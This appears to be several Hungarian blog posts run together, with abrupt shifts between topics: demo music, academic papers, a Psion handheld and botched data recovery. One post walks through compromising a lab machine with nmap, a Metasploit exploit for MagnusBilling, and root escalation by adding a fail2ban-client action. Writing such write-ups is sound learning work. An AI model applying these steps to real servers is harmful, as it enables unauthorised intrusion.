Amikor elkészült nagyjából a videó, megosztottam a MoonShine tagokkal, és megkérdeztem, kinek lenne kedve zenét készíteni hozzá. Alexmus önszántából, minden külső kényszerítéstől függetlenül jelentkezett. Pár nap alatt készített is egy igen ígéretes zenét, amivel a videó egyharmadát le is fedte. Ennek nagyon örültem, úgy éreztem, végre nem csak egyedül alkotok.

Utána két hónapig nem csinált semmit. Mivel a zene nagyon jó volt, úgy döntöttem, sokkal jobb, ha kihagyjuk az Assembly-t és majd a következő demópartyra elkészül. QBParty szemptemberben, Ultimate Meeting decemberben, és már vége is volt az évnek. A zene a videó 80%-t lefedte. Ebből adódóan a fenti partyk egyikére sem küldtem be.

Azután semmi hír. Kezdtem úgy érezni, a projekt teljesen lehalt. Január, február elrepült. Végül elfogyott a türelmem. Márciusban ultimátumot intéztem Alexmus felé. Nem kértem, hogy fejezze be, nem könyörögtem. Egyszerűen csak megírtam, hogy Revision-ön bemutatom. Pont. Úgy gondoltam, 80% zene elég jó, mástnem a végére rákeverem a zene elejét, és kész.

Őszintén szólva, nem hittem, hogy a zene elkészül. Azt hittem megint össze kell csapni az egészet, ahogy máskor is tettem. Grassnak panaszkodtam, elmeséltem neki milyen hányattatott sorsú is ez a produkció. Nevetve annyit mondott, használjak AI-t mert az megvan pár perc alatt. Ezt nem akartam. Nem azért, mert AI ellenség vagyok, hanem ha már Alexmus ennyi időt beleölt, jár neki, hogy a neve ott legyen a nagy képernyőn. Meg annyi bajom van az AI zenékkel, hogy számomra úgy tűnik, a zene lezárása nem megy még.

A másik ok, hogy a MoonShine-ban valahogy nincs közös munka. Mindenki csinálja a saját vackait, mint a közös pályázaton lévő akadémiai kutatócsoportok. Na jó, ez talán erős hasonlat volt. A MoonShine-ban legalább bemutatják egymásnak a saját cuccaikat, kutatócsoportok ilyenre nem veszik a fáradságot.

A legjobban egyébként az zavart, hogy Alexmus korábban a határidő előtt egy nappal küldte az update-et, amikor már nekem nem lett volna időm berakni a hangsávot, és időzíteni, ha szükség lenne rá. Mit csináljak, ha megint Revision előtt egy nappal odaadja a végleges zenét?

Márciusban történt valami. Elkészült a zene! És tök jó lett! Micsoda megkönnyebbülés volt! A zene tökéletesen passzolt, minden rendben volt vele. Pár helyen a hangerőt kell majd állítani, de egyébként minden rendben vele. Most már az én térfelemen pattog a labda, mert például a feliratokban még QBParty, meg 2024 szerepel.

Talán ez a projekt is ösztönzi a többi tagot, hogy jobban kooperáljanak. Talán egy igazi demócsapatot lehet faragni a MoonShine tagokból. Nem lesz könnyű, de valahol el kell indulni.

Először feltérképezzük a rendszert a jó öreg nmap-el:

nmap -p- -Pn $IP

Eredményül megkapjuk a 22-es SSH portot, a 80-as webet és a 3306-os porton a MySQL-t. Az adatbázishoz nem lehet csatlakozni, az SSH-hoz még nincs elég információnk, marad a web.

A webes felületen először egy logó jelenik meg, majd átirányít egy bejelentkező felületre. Először végigpróbáltam a könnyű jelszó kombinációkat, hátha szerencsém lesz, de nem volt. A hibaüzenetek semmitmondóak, a forráskódban nincs használható nyom.

Kipróbáltam néhány SQL injection-t, de egyik sem vezetett sikerre, sőt észrevettem, hogy a túl sok próbálkozás után a webes felület végtelen homokórázásba kezd, tehát van valami védelem a tömeges próbálkozással szemben. Ezt erősítette meg, hogy a gobuster rendre elhasalt, ha a könyvtárakat akartam feltérképezni.

Gyakorlatilag az összes általam ismert támadási felületet védték. Vagy mégsem? Feltűnt, hogy a weboldal forráskódja elég bonyolult, sok átirányítás és beállítási lehetőség van benne. Ez valami keretrendszer lesz! Hátha annak van valami hibája.

A keretrendszerek általában feltűntetik a nevüket és a verziószámukat a forráskódban, de ebben az esetben nem találtam semmi használható nyomot. Mi lenne, ha megnézném a logót?

A logót lementette, majd egy képkereséssel megkaptam, hogy ez a MagnusBilling nevű rendszer. Egy gyors keresés az exploitot között:

searchsploit magnus

Semmi. Gyors keresés a weben, mire a Rapid7 weboldalán találtam valamit. Hoppá, a Metasploitban van hozzá exploit. Innentől gyorsan haladtam, követve a leírást a linken. Nemsokára volt konzolom.

A sudo -l szerint a fail2ban-client programot tudjuk futtatni. Mi a fene az a fail2ban? Néhány keresés után kiderült, hogy ez egy olyan program, ami IP-ket tud kitiltani különböző szabályok szerint. Például ha túl sok kérés érkezik. Ezért nem tudtam sokat próbálgatni a weboldalt, és ezért nem ment a gobuster sem.

Találtam sok leírást arról, hogy hogyan lehet root jogokra szert tenni, ha tudjuk szerkeszteni a konfigurációs állományokat. Balszerencsémre én semmit nem tudtam szerkeszteni, csak a fail2ban-client programot futtatni.

A dokumentáció alapján úgy tűnik, mindent be lehet állítani a kliens programból is. Sajnos a legtöbb tutorial arról szólt, hogyan szerkesszük a konfigurációs fájlokat, vagy hogyan tudjuk megszüntetni egy IP tiltását.

Röviden a fail2ban definiált szabályokat, és akciókat, hogy mit kell csinálni, ha egy szabályt megsértenek, majd az akción belül parancsokat, ami a tényleges feladat végrehajtása. Tehát az egyik akciót kell átdefiniálnom, hogy futtasson egy root shellt, ha túl sokszor írok be hibás jelszót a webre. Egyszerűen hangzik.

A konfigurációs fájlban két nagyobb szabály volt. Az egyik a weboldal bejelentkezéseit figyeli, a másik az ssh-ról érkező kéréseket. Az ssh-nál viszont volt egy elírás, amiből arra következtetek, hogy abban az esetben nem tud lefutni az akció.

Ha átírtam az akciót, akkor futási hibát kaptam, ha túl sokszor próbáltam belépni. Tehát valamit felüldefiniáltam, de nem kaptam meg a várt root shell-t. Gondoltam, talán rossz akcióval próbálkoztam, mert lehet akciót definiálni arra is, hogy a bannolás előtt mit futtasson. A vége az lett, hogy teljesen elrontottam a fail2ban-t. Működésképtelenné vált.

Leállítottam a virtuális gépet, és pihentettem a dolgot. Közben elkeztem túrni a netet, hátha találok valamit, hogyan lehet a kliens programmal átírni az akciókat.

Végül ezt találtam. A megoldás nem az volt, hogy átdefiniálok egy akciót, hanem új akciót adok hozzá. Erre a lehetőségre nem gondoltam. Megcsináltam a lépéseket, és már root is voltam.

Eredetileg erről a publikációról nem akartam semmit írni, de sdani kommentje után úgy gondoltam, érdemes megmutatni, hogy nem csak élőhalott kutatások vannak Magyarországon, és én sem csak selejtes vizsgálatokban veszek részt. Szóval van még élet az akadémiai szférában. Egyszerűen csak arról van szó, hogy a kutatások hullámzó tendenciát mutatnak. Ahogy egy sportolónak is van rosszabb éve, úgy vannak rosszabb projektek.

Egy perfekcionista csoport megteheti, hogy a kevésbé ígéretes témákat eltemeti, mi nem vagyunk ilyen szerencsések. Ráadásul mi inkább csak támogatunk egy meglévő kutatást, ritkán vezetjük azt, ezért kisebb ráhatásunk van a folyamatokra.

Kérdezhetitek, akkor erről a cikkról miért nem akartam írni? Nos, mert nem sokat csináltam. Szokásos smCounter2 bűvészkedés volt. Eredetileg úgy éreztem, hogy nincs benne olyan tanúság, ami más posztokban meg nem jelent volna.

Most viszont úgy gondolom, hogy igenis van tanúság. Egyszerűen az, hogy annyira elmerülünk a problémákban, hogy ha nincsenek problémák, akkor azt letudjuk, és rögtön a következő probléma felé fordulunk. Igazából ilyenkor megállhatnánk egy pillanatra, és örülhetnénk annak, hogy minden rendben ment.

Esetleg büszkék lehetnénk rá, hogy elértünk valamit. Mert akármennyire is sulykolja az egyetemi vezetés, hogy minden publikációt össze kell gyűjteni egy Excel táblázatba és villogni vele, hogy 300 D1-es cikk született egy évben, azért tudatosítani kellene azt is, hogy emögött a szám mögött 300 plusz információ van, amiről eddig kevesebbet tudtunk.

Vegyük például ezt a cikket. Leukémiás gyerekek mintáit vizsgáltuk. A szomatikus mutációk nem mutatnak nagy meglepetést, NRAS, KRAS gének romlottak el elsődlegesen. Viszont sikerült kifejleszteni egy olyan diagnosztikai panelt, ami a DNS és RNS adatokat összevetve képes lehet segítséget nyújtani a beteg gyerekek kezeléséhez.

Nyilván ez még nem egy kész eljárás, de egy lépéssel közelebb vihet hozzá. Ennek is lehet örülni, nem csak egy kész, díjnyertes kutatásnak. A pici sikereket is meg kell becsülni.

Megjelent egy újabb publikációnk. Csoda, hogy megjelent. Nem is tudom szavakba önteni, mennyi minden hátráltatta az adatgyűjtést, a vizsgálatokat és a megjelenést, ezért csak egy videóval összegezném a szenvedést, amit átéltünk:

Az egész egy nyúlbetegséggel indult, amiből GWAS-t akartunk csinálni. Az első probléma az volt, hogy nem lehetett pontosan megmondani, melyik állat beteg, mert a tünetek átfedtek egy csomó más betegséggel. Néha a boncolás után derült ki, hogy másban pusztult el az állat, és nem a vizsgálni kívánt betegségben. A nyilvántartás hibás volt, mert a nyúlketrecnél dolgozók nem vették komolyan az állatok jelölését. Olyan is volt, hogy a genom elemzése közben vettem észre, hogy apu nyuszi inkább anyu nyuszi, csak elírták az Excel táblában.

Apropó Excel tábla. A sok adatot mind egyetlen Excelbe vitték fel, ami végül akkorára duzzadt, hogy a legtöbb laptop memóriájában el sem fért. Vagy betöltötte egy részét, és nem tudta rendesen elmenteni, aminek az lett a vége, hogy az adatok egy része eltűnt.

Gyűjtöttünk genomokat, metagenomoka, RNASeq-et, mindent. Majd kiderült, hogy egy részét nem publikálhatjuk, mert valami különleges nyúlfajtából származnak, és a genom közzétételéhez a tenyésztő nem adta áldását. Később egyre inkább az volt az érzésünk, hogy az ipari partnert nem is érdekli az eredmény, ők inkább a termékenységhez köthető vizsgálatokat részesítik előnybe. Az, hogy néhány nyúl megdöglik egy betegségben, az nem számít (persze a pályázatból származó pénzre nem mondtak neme, de miután megkapták, látványosan lecsökkent a segítség, amit nyújtottak).

Az idő csak telt, és lassan kiderült, hogy az összegyűjtött adatokból nem lehet statisztiai módszerekkel meghatározni, hogy milyen genetikai elváltozásokkal asszociál a betegség, mert nincs elég minta.

Közben személyes problémák is felléptek. A megbeszélések személyeskedő hangvételre váltottak, ami szintén nem tett jót a további kooperációnak. A csoportunkból is mentek el a projekten dolgozó emberek, így egyre inkább úgy tűnt, hogy a több évnyi munka mind megy a kukába.

Egyetlen halvány reménysugárnak az tűnt, hogy elfelejtjük az egész betegséget, és azokból a szekvencia adatokból, amelyeket megoszthatunk a tudományos közösséggel, populációgenetikát csinálunk. Mivel a mintagyűjtésnél ez nem volt cél, a különböző nyúl fajták eltérő számban voltak reprezentálva, amit a bírálók teljesen jogosan szóvá is tettek, ezért további fajtákat szórtunk ki a vizsgálatból.

Végül a kézirat döcögősen, de megjelent. A csoportot elhagyó kollégák egy csomót szenvedtek, hogy az új munkahely elvárásai mellett ezzel a kézirattal is haladjanak. Valahogy megoldották. Valahogy sikerült. A pezsgőbontás mégis elmaradt, inkább olyan érzésem van, mintha levethetném a vizes göncöt egy esőbe fulladt kirándulás után. Senkinek nem kívánok ilyen projektet.

Még az egyetem alatt az ökológia tanszéknek segítettem adatfeldolgozó programokat írni, amikor egyik alkalommal átnéztük a tanszék korábbi vezetőjének hátrahagyott vackait. A profról annyit kell tudni, hogy szeretett a kutatásaihoz eszközöket vásárolni, de végül ezeket soha nem használta fel. Bekerültek egy szobába, és többet rájuk sem nézett.

Az új tanszékvezető szerette volna a saját kutatásait hatékonyabbá tenni az eszközökkel. A kacatok között találtunk egy Psion Organiser 2 XP-t. Nagyon megtetszett a bumfordi kis szerkezet, és elhatároztuk, hogy a terepen a befogott állatok viselkedését fogjuk monitorozni vele.

Írtam rá egy kis programot, de végül egy-két próba után feladtuk a terveket, mert annyi paramétert kellett volna rögzíteni, hogy lehetetlen volt emlékezni az összes billentyű kombinációra, ezért visszatértek a spirálfüzethet.

A szerkezet mély nyomokat hagyott bennem. Napokig jártam-keltem a géppel, amíg fejlesztettem rá a programot, és mindig találtam valami ürügyet, hogy a gombokat nyomkodjam. Évekkel később szereztem egy saját példányt, egy LZ 64-t, és most újra elővettem, mert nagy terveim vannak vele.

Először is ez a példány már négy soros kijelzővel rendelkezik. A belső memóriája 64k méretű, ami elég impresszív egy '80-as évekből származó kézi kütyütől. Teljes billentyűzete van, áramforrásként meg egy 9V-os elem szolgál. Saját BASIC-szerű programozási nyelve van, a tetején meg egy 16 tüskés csatlakozó, amivel különböző perifériákat csatlakoztathatunk. Még a 2010-es években is láttam olyan boltot, ahol Psion volt a pénztárgép egy vonalkód olvasóval.

Azóta sok idő telt el. Általában megpróbálok a régi eszközöknek funkciót találni a mai világban, de a Psionnál kudarcot vallottam. Az egész eszöz karakter központú, a bépített billentyűzet használata lassú. Bár sok hasznosnak tűnő program van alapból is a gépen, ezek használatát nagyon megnehezíti, hogy gombokkal kell váltani közöttük. A négy soros, húsz karakter széles képernyő pedig nem kedvez a hosszabb szövegeknek. Ahogy a fenti példa is mutatta, sajnos a készülék legnagyobb ellenfele a papír alapú határidőnapló.

Azokat, akik még manapság is a gép bűvöletében élnek, nem érdekli a funkcionalitás. Néhány ember továbbra is támogatja a gépet, aminek hála sok dokumentáció és programok is elérhetőek hozzá.

Bár többen mondták, hogy az elveszett adatot meg lehet próbálni helyreállítani, az nagyon költséges, és nem hoz 100% sikert, kifizettek valami irdatlan mennyiségű pénzt egy holland cégnek, amelyik azt állította, hogy vissza tudják nyerni az adatokat.

A diszkeket kiszerelték és elpostázták a cégnek, akik vissza is küldték az adatokat néhány USB-s NTFS fájlrendszert tartalmazó adattárolón.

Azt gondolhatnánk, hogy innen már minden csupa napfény és zene, a bioinformatikusok örülhetnek, hogy megmenekültek a kis fájlok. Hehehe, akkor miről írnék bejegyzést?

Szóval az első probléma, hogy a szerveren nincs USB. A második, hogy én távolról menedzselem a rendszert, de ha helyileg ott is lennék, akkor sem léphetek be a szent szerverterembe.

Úgyhogy volt egy nagy megbeszélés, ahol ott volt az informatikai igazgató, a rendszer adminisztrátor, mindenki. Elkezdődött a diskurzus, de jobbnak láttam, ha nem szólok, mert mindjárt az elején olyan vita alakult ki, hogy egyáltalán a kérdéses RAID tömb az most storage, vagy tárhely. A vita végén látthatta az informatikai igazgató, hogy csupa kutyaütő veszi körül, ezért határozottan azt mondta, hogy ezt a problémát nekik kell megoldani, a többiek nem is asszisztálhatnak hozzá.

Gondoltam, most jó kezekben lesz minden. De az akadémiai szférában nagy luxus ez a fajta elbizakodottság.

Eltelt két hónap, és egyre sürgetőbb emaileket kaptam, hogy mikor lesz hozzáférhető az adat. Egy ideig ellenálltam, hogy megkérdezzem az illetékeseket, mert egyrészt USB-n kell visszamásolni terabájtokat, másrészt az informatikai titkárság csak három emberből áll. Rettenetesen le vannak terhelve. Egy idő után viszont kénytelen voltam megkérdezni, hogyan áll a projekt.

Kiderült: sehogy. Még el sem kezdték. Az email után újabb egy héttel kiosztották a feladatot egy külső cég emberének, akivel már dolgoztam együtt. Végül mi ketten (illetve többségében ő) visszamásoltuk az adatokat. Egyébként a folyamatos egyeztetések során hasznos tippeket kaptam, hogy miként lehetne a szervert kicsit tuningolni, mert kiderült, hogy néhány beállításom nem volt éppen a legoptimálisabb. Ezeket nagyon hasznosnak találtam, ez határozottan egy pozitív hozadéka volt az eseményeknek.

Akkor jöhet a pezsgő és a happy end? Nem, mert ez a gyarló világ. Elkezdtem felhaszálni néhány nagyobb FASTQ fájlt a visszaállított adatokból, és az elemző programok rendre elszálltak rajtuk. Olyan hibaüzeneteket kaptam, hogy a szekvencia hosszabb, mint a quality, vagy a szekvencia és a quality nem + jellel van elválasztva.

Rövid nézegetés után kiderült, hogy bár a fájlok neve és mérete pontos, a tartalmuk sok esetben csak nyomokban emlékeztet az eredetire. A fájl eleje még jó, majd egyszer csak bináris szutyokká válik az egész.

Visszagondoltam az elmúlt egy évre, elmerengtem az élet értelmén. Érdekes módon nem érzek dühöt, vagy haragot. Kárörvendést sem. Csak sóhajtottam egyet, és letöröltem mindent, ami használhatatlanná vált.